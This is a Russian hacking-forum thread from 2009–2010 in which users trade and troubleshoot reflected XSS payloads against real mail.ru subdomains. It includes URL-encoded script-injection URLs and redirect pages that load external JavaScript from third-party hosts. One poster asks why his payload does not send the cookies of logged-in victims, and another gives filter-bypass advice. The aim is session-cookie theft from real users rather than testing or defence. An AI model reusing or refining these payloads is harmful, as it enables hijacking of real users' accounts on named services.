Вопрос по пассивной XSS

Discussion in 'Песочница' started by maxim_mm, 20 Dec 2009.

  1. maxim_mm

    maxim_mm New Member

    Joined:
    17 Dec 2009
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    12 декабря, в теме пассивные XSS - выложена вот такая пасивка
    Code:
    http://story.travel.mail.ru/?mod=story&city_id=1543&%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28/Ruslan1817/%29%3C/script%3E
    создаю index.html с таким содержимым
    Code:
    <html> <head> <META HTTP-EQUIV='Refresh' content ='0; URL= http://story.travel.mail.ru/?mod=story&city_id=1543&%27%3E%3C%27%27%3E%22%3E%3Cscript src=%22http://test23.1gb.ru/js.js%22%3C/script%3E'> </head> </html>
    файл js.js
    Code:
    alert(/bla bla bla/)
    По идее ведь, при попадании на мою страничку - должна сработать эта пасивка и запустится этот тестовый скриптик.

    А он почему то не запускается...

    P.S. пробую это первый раз...
     
  2. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    193
    Likes Received:
    195
    Reputations:
    91
    Там фильтрация на пробелы - они заменяются на нижний прочерк.
     
  3. maxim_mm

    maxim_mm New Member

    Joined:
    17 Dec 2009
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    создаю index.html с таким содержимым
    Code:
    <html> <head> <META HTTP-EQUIV='Refresh' content ='0; URL= http://story.travel.mail.ru/?mod=story&city_id=1543&%27%3E%3C%27%27%3E%22%3E%3Cscript src=%22http://test23.1gb.ru/js.js%22%3C/script%3E'> </head> </html>

    заменил на
    Code:
    <html> <head> <META HTTP-EQUIV='Refresh' content ='0; URL= http://story.travel.mail.ru/?mod=story&city_id=1543&%27%3E%3C%27%27%3E%22%3E%3Cscript src=%22http://test23.1gb.ru/js.js%22%3E%3C/script%3E'> </head> </html>
    А то у меня там > не закрывалась после <script...

    А с фильтрацией пробела.. заменить пробел на _ в тексте?
    Попробовал. скрипт не выполнился... ну или я не увидел его выполнения...

    Когда пишу скрипт внутри тэгов <script> </script> все работает... ставлю внешний - не работает. что еще я могу не так делать?
     
    #3 maxim_mm, 20 Dec 2009
    Last edited: 20 Dec 2009
  4. maxim_mm

    maxim_mm New Member

    Joined:
    17 Dec 2009
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Разобрался)
     
  5. pitter

    pitter New Member

    Joined:
    2 Oct 2009
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    У меня вопрос вот есть пассивка
    http://11x11.mail.ru/tournaments/414252/act=join&%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Работает она токо у авторизованных
    Почему она не присылает куки
    со всеми остальными пассивками все работает

    в index.php прописываю
    <script>document.location.href="http://11x11.mail.ru/tournaments/414252/act=join&%27%3E%3C%27%27%3E%22%3E%3Cscript%20src=%22http://wowvk.ru/js.js%22%3E%3C/script%3E"</script>
     
    #5 pitter, 26 Feb 2010
    Last edited: 26 Feb 2010
Loading...
Similar Threads - Вопрос пассивной
  1. gilo20
    Replies:
    2
    Views:
    2,553
  2. Dobi768
    Replies:
    2
    Views:
    2,450
  3. avva99on
    Replies:
    0
    Views:
    2,444